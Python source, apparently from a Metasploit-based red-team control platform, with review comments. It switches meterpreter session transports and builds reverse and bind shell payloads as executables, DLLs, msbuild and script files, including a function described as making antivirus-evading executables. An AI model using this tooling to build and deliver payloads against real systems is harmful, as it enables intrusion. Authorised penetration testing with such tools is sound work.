    def update(sessionid: int | None = None, action: str | None = None, sleep: int = 0):
        """Switch or sleep a session's transport through the RPC backend.

        Args:
            sessionid: Session id. ``None`` or a value ``<= 0`` is rejected
                with status 306 before any RPC call is made.
            action: ``"next"``, ``"prev"`` or ``"sleep"``; any other value
                skips the RPC call and is reported as a failed switch (302).
            sleep: Seconds handed to the RPC call on the ``"sleep"`` path;
                unused otherwise.

        Returns:
            A ``data_return`` context: 202 after a successful next/prev
            switch, 203 after a successful sleep, 305 when the sleep call
            fails, 302 when next/prev fails or ``action`` is unknown, and
            306 for an invalid ``sessionid``.
        """
        # NOTE(review): ``sessionid <= 0`` assumes an int; a str id would raise
        # TypeError here rather than return 306 — convert at the call site.
        if sessionid is None or sessionid <= 0:
            context = data_return(306, TRANSPORT_MSG.get(306), {})
            return context
        if action == "next":
            result_flag = RpcClient.call(
                Method.SessionMeterpreterTransportNext, [sessionid])
        elif action == "prev":
            result_flag = RpcClient.call(
                Method.SessionMeterpreterTransportPrev, [sessionid])
        elif action == "sleep":
            result_flag = RpcClient.call(
                Method.SessionMeterpreterTransportSleep, [sessionid, sleep])
            if result_flag:
                # Wall-clock time at which the session is expected back; only
                # used for the operator notice below.
                reconnect_time = time.time() + sleep
                Notice.send_warn(
                    f'切换Session到休眠 SID:{sessionid} 重连时间: {time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(reconnect_time))}'
                )

                context = data_return(203, TRANSPORT_MSG.get(203), {})
                return context
            else:
                # NOTE: the failure payload is ``[]`` here but ``{}`` on the
                # other failure paths; callers should not rely on its type.
                context = data_return(305, TRANSPORT_MSG.get(305), [])
                return context

        else:
            # Unknown action: no RPC call, fall through to the 302 response.
            result_flag = False
        if result_flag:
            Notice.send_info(f"切换传输完成 SID:{sessionid}")
            context = data_return(202, TRANSPORT_MSG.get(202), {})
            return context
        else:
            context = data_return(302, TRANSPORT_MSG.get(302), [])
            return context
    def generate_bypass_exe(mname: str | None = None, opts: dict | None = None):
        """Build an exe from a payload's shellcode via the MinGW helper.

        Original docstring: "生成免杀的exe" (generate an AV-evading exe).
        The evasion itself, if any, lives in ``_create_payload_by_mingw``,
        which is not visible here.

        Args:
            mname: Payload module name; searched for ``reverse``/``bind`` and
                ``meterpreter_`` and passed through to ``MSFModule.run``.
            opts: Payload options. Mutated in place: the host key that does
                not match the payload direction is dropped, Override* values
                are applied, ``EXTENSIONS`` may be rewritten and ``Format``
                is forced to ``"hex"``.

        Returns:
            The value returned by ``Payload._create_payload_by_mingw``, or
            ``None`` when ``MSFModule.run`` returned ``None``.
        """
        # Drop the host option that does not apply to the payload direction.
        # NOTE(review): ``find(...) > 0`` misses a match at index 0, and the
        # broad ``except Exception`` hides more than a missing key;
        # ``opts.pop('RHOST', None)`` expresses the intent directly.
        if mname.find("reverse") > 0:
            try:
                opts.pop('RHOST')
            except Exception as _:
                pass
        elif mname.find("bind") > 0:
            try:
                opts.pop('LHOST')
            except Exception as _:
                pass

        # When OverrideRequestHost is set, substitute the Override* values for
        # LHOST/LPORT and clear the flag so it is not forwarded to the module.
        # NOTE(review): OverrideLHOST/OverrideLPORT are read with ``[]`` and
        # raise KeyError if absent — confirm the caller always supplies both.
        if opts.get('OverrideRequestHost') is True:
            opts["LHOST"] = opts['OverrideLHOST']
            opts["LPORT"] = opts['OverrideLPORT']
            opts['OverrideRequestHost'] = False
            Notice.send_warn("Payload包含OverrideRequestHost参数")
            Notice.send_warn(f"将LHOST 替换为 OverrideLHOST:{opts['OverrideLHOST']}")
            Notice.send_warn(f"将LPORT 替换为 OverrideLPORT:{opts['OverrideLPORT']}")

        # EXTENSIONS arrives as a boolean toggle; map it to the value the
        # meterpreter_* modules expect.
        if "meterpreter_" in mname and opts.get('EXTENSIONS') is True:
            opts['EXTENSIONS'] = 'stdapi'

        # Hex output is requested so the result can be decoded to raw bytes.
        opts["Format"] = "hex"
        result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
        if result is None:
            return None
        # NOTE(review): if ``result`` lacks a 'payload' key, b64decode(None)
        # raises TypeError — depends on MSFModule.run's contract; confirm.
        shellcode = base64.b64decode(result.get('payload'))
        byteresult = Payload._create_payload_by_mingw(mname=mname, shellcode=shellcode)
        return byteresult
    def generate_shellcode(mname: str | None = None, opts: dict | None = None) -> bytes | None:
        """Generate a payload's raw bytes from the given options.

        Args:
            mname: Payload module name; searched for ``reverse``/``bind``,
                ``meterpreter_`` and a platform keyword, and passed through
                to ``MSFModule.run``.
            opts: Payload options. Mutated in place: the host key that does
                not match the payload direction is dropped, Override* values
                are applied, ``EXTENSIONS`` may be rewritten and ``Format``
                is chosen from the platform keyword in ``mname``.

        Returns:
            The base64-decoded ``payload`` field of the module result, or
            ``None`` when ``MSFModule.run`` returned ``None``.
        """
        # Drop the host option that does not apply to the payload direction.
        # NOTE(review): ``find(...) > 0`` misses a match at index 0, and the
        # broad ``except Exception`` hides more than a missing key;
        # ``opts.pop('RHOST', None)`` expresses the intent directly.
        if mname.find("reverse") > 0:
            try:
                opts.pop('RHOST')
            except Exception as _:
                pass
        elif mname.find("bind") > 0:
            try:
                opts.pop('LHOST')
            except Exception as _:
                pass

        # When OverrideRequestHost is set, substitute the Override* values for
        # LHOST/LPORT.
        # NOTE(review): unlike the sibling generators, the flag itself is not
        # reset to False here, so it is still forwarded to the module —
        # confirm whether that is intentional.
        # OverrideLHOST/OverrideLPORT are read with ``[]`` and raise KeyError
        # if absent.
        if opts.get('OverrideRequestHost') is True:
            opts["LHOST"] = opts['OverrideLHOST']
            opts["LPORT"] = opts['OverrideLPORT']
            Notice.send_warn("Payload包含OverrideRequestHost参数")
            Notice.send_warn(
                f"将LHOST 替换为 OverrideLHOST:{opts['OverrideLHOST']}")
            Notice.send_warn(
                f"将LPORT 替换为 OverrideLPORT:{opts['OverrideLPORT']}")

        # EXTENSIONS arrives as a boolean toggle; map it to the value the
        # meterpreter_* modules expect.
        if "meterpreter_" in mname and opts.get('EXTENSIONS') is True:
            opts['EXTENSIONS'] = 'stdapi'

        # Output format by platform keyword. Only java and python differ from
        # the 'raw' default; the windows/linux/php branches are redundant
        # but kept so the mapping is explicit.
        opts["Format"] = 'raw'
        if "windows" in mname:
            opts["Format"] = 'raw'
        elif "linux" in mname:
            opts["Format"] = 'raw'
        elif "java" in mname:
            opts["Format"] = 'jar'
        elif "python" in mname:
            opts["Format"] = 'py'
        elif "php" in mname:
            opts["Format"] = 'raw'

        result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
        if result is None:
            return result
        # NOTE(review): if ``result`` lacks a 'payload' key, b64decode(None)
        # raises TypeError — depends on MSFModule.run's contract; confirm.
        byteresult = base64.b64decode(result.get('payload'))
        return byteresult
    def create(mname: str | None = None, opts: dict | None = None):
        """Generate a payload file and return it as an HTTP download.

        Args:
            mname: Payload module name; searched for ``reverse``/``bind``,
                ``meterpreter_`` and a platform keyword, and passed through
                to ``MSFModule.run``.
            opts: Payload options. Mutated in place (host key pruning,
                Override* substitution, ``EXTENSIONS`` rewrite and ``Format``
                resolution). ``Format`` selects one of the build paths
                below; ``HandlerName``, when present, is used in the
                download filename on the ``*-diy`` path.

        Returns:
            An ``HttpResponse`` with ``application/octet-stream`` content and
            ``Code``/``Message``/``Content-Disposition`` headers on success;
            a ``data_return`` context with 306 when ``Format`` is ``AUTO``
            and no platform keyword matches, or 305 when ``MSFModule.run``
            returns ``None``.
        """

        # NOTE(review): the block below reads like Ruby option handling kept
        # as a reference; it is commented out and has no effect here.
        # badchars = opts['BadChars'] | | ''
        # fmt = opts['Format'] | | 'raw'
        # force = opts['ForceEncode'] | | false
        # template = opts['Template'] | | nil
        # plat = opts['Platform'] | | nil
        # keep = opts['KeepTemplateWorking'] | | false
        # force = opts['ForceEncode'] | | false
        # sled_size = opts['NopSledSize'].to_i | | 0
        # iter = opts['Iterations'].to_i | | 0

        # Remove previously generated files before producing a new one.
        Payload._destroy_old_files()

        # Drop the host option that does not apply to the payload direction.
        # NOTE(review): ``find(...) > 0`` misses a match at index 0, and the
        # broad ``except Exception`` hides more than a missing key;
        # ``opts.pop('RHOST', None)`` expresses the intent directly.
        if mname.find("reverse") > 0:
            try:
                opts.pop('RHOST')
            except Exception as _:
                pass
        elif mname.find("bind") > 0:
            try:
                opts.pop('LHOST')
            except Exception as _:
                pass

        # When OverrideRequestHost is set, substitute the Override* values for
        # LHOST/LPORT and clear the flag so it is not forwarded to the module.
        # NOTE(review): OverrideLHOST/OverrideLPORT are read with ``[]`` and
        # raise KeyError if absent — confirm the caller always supplies both.
        if opts.get('OverrideRequestHost') is True:
            opts["LHOST"] = opts['OverrideLHOST']
            opts["LPORT"] = opts['OverrideLPORT']
            opts['OverrideRequestHost'] = False
            Notice.send_warn("Payload包含OverrideRequestHost参数")
            Notice.send_warn(f"将LHOST 替换为 OverrideLHOST:{opts['OverrideLHOST']}")
            Notice.send_warn(f"将LPORT 替换为 OverrideLPORT:{opts['OverrideLPORT']}")

        # EXTENSIONS arrives as a boolean toggle; map it to the value the
        # meterpreter_* modules expect.
        if "meterpreter_" in mname and opts.get('EXTENSIONS') is True:
            opts['EXTENSIONS'] = 'stdapi'

        # Resolve Format=AUTO from the platform keyword in mname; an unknown
        # platform is reported as 306 instead of guessing.
        if opts.get("Format") == "AUTO":
            if "windows" in mname:
                opts["Format"] = 'exe-src'
            elif "linux" in mname:
                opts["Format"] = 'elf'
            elif "java" in mname:
                opts["Format"] = 'jar'
            elif "python" in mname:
                opts["Format"] = 'py'
            elif "php" in mname:
                opts["Format"] = 'raw'

            else:
                context = data_return(306, Payload_MSG.get(306), {})
                return context

        # Each branch below must leave ``byteresult`` (bytes or an open file)
        # and ``filename`` set for the response section at the end.
        if opts.get("Format") in ["exe-diy", "dll-diy", "dll-mutex-diy", "elf-diy"]:
            # Fetch the payload as hex, then hand the decoded bytes to the
            # loader builder; the requested format is kept in tmp_type.
            tmp_type = opts.get("Format")
            opts["Format"] = "hex"
            result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
            if result is None:
                context = data_return(305, Payload_MSG.get(305), {})
                return context

            byteresult = base64.b64decode(result.get('payload'))
            filename = Payload._create_payload_with_loader(mname, byteresult, payload_type=tmp_type)
            # Read back the generated archive from the temp directory.
            payloadfile = os.path.join(File.tmp_dir(), filename)
            # NOTE(review): "(unknown)" looks like a mangled placeholder in
            # this listing (possibly ``{filename}`` originally) — confirm
            # against the repository before relying on the produced name.
            # HandlerName is caller-supplied and ends up in the
            # Content-Disposition header below; see the note there.
            if opts.get("HandlerName") is not None:
                filename = f"{opts.get('HandlerName')}_(unknown)"
            # NOTE(review): the file object is handed to HttpResponse without
            # a ``with``; whether it is closed depends on how HttpResponse
            # consumes file-like content — confirm, or read the bytes here.
            byteresult = open(payloadfile, 'rb')
        elif opts.get("Format") == "msbuild":
            # Fetch the payload in csharp form and wrap it with the msbuild
            # helper.
            opts["Format"] = "csharp"
            result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
            if result is None:
                context = data_return(305, Payload_MSG.get(305), {})
                return context
            byteresult = base64.b64decode(result.get('payload'))
            filename = Payload._create_payload_use_msbuild(mname, byteresult)
            # Read back the generated archive from the temp directory.
            payloadfile = os.path.join(File.tmp_dir(), filename)
            # NOTE(review): same open-without-close question as the diy path.
            byteresult = open(payloadfile, 'rb')
        elif opts.get("Format") == "exe-src":
            # Hex payload decoded to bytes and built into an exe via MinGW.
            opts["Format"] = "hex"
            result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
            if result is None:
                context = data_return(305, Payload_MSG.get(305), {})
                return context
            byteresult = base64.b64decode(result.get('payload'))
            byteresult = Payload._create_payload_by_mingw(mname=mname, shellcode=byteresult)
            # Timestamp-based filename; two calls within a second collide.
            filename = "{}.exe".format(int(time.time()))
        elif opts.get("Format") == "exe-src-service":
            # As exe-src, but built with the service payload type.
            opts["Format"] = "hex"
            result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
            if result is None:
                context = data_return(305, Payload_MSG.get(305), {})
                return context
            byteresult = base64.b64decode(result.get('payload'))  # b64decode(None) would raise if result were None; guarded above
            byteresult = Payload._create_payload_by_mingw(mname=mname, shellcode=byteresult,
                                                          payload_type="REVERSE_HEX_AS_SERVICE")
            filename = "{}.exe".format(int(time.time()))
        else:
            # Plain module output: choose the file extension from Format.
            # ``None`` (elf) or an unknown Format yields a bare timestamp name.
            file_suffix = {
                "c": "c",
                "csharp": "cs",
                "exe": "exe",
                "exe-service": "exe",
                "powershell": "ps1",
                "psh-reflection": "ps1",
                "psh-cmd": "ps1",
                "hex": "hex",
                "hta-psh": "hta",
                "raw": "raw",
                "vba": "vba",
                "vbscript": "vbs",
                "elf": None,
                "elf-so": "so",
                "jar": "jar",
                "java": "java",
                "war": "war",
                "python": "py",
                "py": "py",
                "python-reflection": "py",
            }
            result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
            if result is None:
                context = data_return(305, Payload_MSG.get(305), {})
                return context
            byteresult = base64.b64decode(result.get('payload'))
            if file_suffix.get(opts.get("Format")) is None:
                filename = "{}".format(int(time.time()))
            else:
                filename = "{}.{}".format(int(time.time()), file_suffix.get(opts.get("Format")))

        # Build the download response. Code/Message are custom headers; the
        # message is URL-quoted because it is not ASCII.
        response = HttpResponse(byteresult)
        response['Content-Type'] = 'application/octet-stream'
        response['Code'] = 200
        response['Message'] = parse.quote(Payload_MSG.get(201))
        # Non-ASCII filename handling: the stem is URL-quoted, the extension
        # is appended as-is.
        # NOTE(review): the header holds only the quoted name (no
        # ``attachment; filename=`` prefix) — presumably the front end
        # rebuilds the disposition; verify. Only the stem is quoted, so a
        # caller-supplied HandlerName that contains a dot would put an
        # unquoted suffix into the header — confirm the input is validated.
        urlpart = parse.quote(os.path.splitext(filename)[0], 'utf-8')
        leftpart = os.path.splitext(filename)[-1]
        response['Content-Disposition'] = f"{urlpart}{leftpart}"
        return response